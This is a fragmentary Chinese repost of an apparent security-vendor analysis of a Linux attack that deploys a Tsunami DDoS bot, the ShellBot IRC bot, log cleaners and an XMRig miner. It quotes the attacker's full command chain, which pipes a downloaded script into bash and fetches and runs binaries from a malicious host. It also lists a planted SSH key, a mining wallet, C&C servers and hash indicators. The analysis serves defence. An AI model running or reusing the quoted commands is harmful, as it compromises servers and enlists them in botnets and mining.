# nvidia-smi –list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O – ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+
78
TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdi q9hVz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+
/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/
9
XRlddH3HkNuRlZLQMk5oGHTxeySK KfqoAoXgZXac9VBAPRUU+
0
PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/
5
ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iD
表 3. Tsunami 配置数据
图 6. ShellBot 的配置数据
图 7. 如何使用 MIG LogCleaner
图 12. XMRig 실행 흐름
挖币所需的配置数据保存在同一路径下的“config.json”文件中。
Mining
Pool : monerohash[.]com:80
user
:
“46WyHX3L85SAp3oKu1im7EgaVGBsWYhf7KxrebESVE6QHA5vJRab6wF1gsVkYwJfnNV2KYHU1Xq2A9XUYmWhvzPf2E6Nvse”
pass
:
“nobody”
4.结论
文件检测
– Linux/CoinMiner.Gen2 (2019.07.31.08)
– Linux/Tsunami.Gen (2016.08.24.00)
– Shellbot/Perl.Generic.S1118 (2020.02.19.07)
– Downloader/Shell.Agent.SC189601 (2023.06.12.02)
– HackTool/Linux.LogWiper.22272 (2023.06.12.02)
– HackTool/Linux.LogWiper.28728 (2023.06.12.02)
– Trojan/Linux.Agent.8456 (2023.06.12.02)
– Trojan/Shell.Runner (2023.06.12.02)
– CoinMiner/Text.Config (2023.06.12.02)
IOC-Md5
–
6187
ec1eee4b0fb381dd27f30dd352c9 : Downloader Bash script (key)
–
822
b6f619e642cc76881ae90fb1f8e8e : Tsunami (a)
– c5142b41947f5d1853785020d9350de4 : ShellBot (bot)
–
2
cd8157ba0171ca5d8b50499f4440d96 : ShellBot (logo)
–
32
eb33cdfa763b012cd8bcad97d560f0 : MIG Logcleaner v2
.0
(cls)
–
98
b8cd5ccd6f7177007976aeb675ec38 :
0x333s
hadow Log Cleaner (clean)
– e2f08f163d81f79c1f94bd34b22d3191 : Privilege Escalation Malware (ping6)
–
725
ac5754b123923490c79191fdf4f76 : Bash launcher (
go
)
– ad04aab3e732ce5220db0b0fc9bc8a19 : Bash launcher (televizor)
–
421f
fee8a223210b2c8f2384ee6a88b4 : Bash launcher (telecomanda)
–
0014403121
eeaebaeede796e4b6e5dbe : XMRig CoinMiner (cnrig)
–
125951260
a0cb473ce9b7acc406e83e1 : XMRig configuration file (config.json)
C&C
–
ircx
.us
[.]
to
:20
:
ShellBot
–
ircx
.us
[.]
to
:53
:
Tsunami
–
ircx
.us
[.]
to
:6667
:
ShellBot
–
ircxx
.us
[.]
to
:53
:
Tsunami
下载
– ddoser[.]org/key: Downloader Bash script
– ddoser[.]org/a : Tsunami
– ddoser[.]org/logo : ShellBot
– ddoser[.]o]rg/siwen/bot / ShellBot DDoS Bot
– ddoser[.]org/top : Compressed XMRig CoinMiner file
– ddoser[.]org/siwen/cls : MIG Logcleaner v2
.0
– ddoser[.]org/siwen/clean :
0x333s
hadow Log Cleaner
– ddoser[.]org/siwen/ping6 : Privilege escalation malware
原文地址:
https://asec.ahnlab.com/en/54647/
原文始发于微信公众号(Ots安全):Tsunami DDoS 恶意软件分析
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论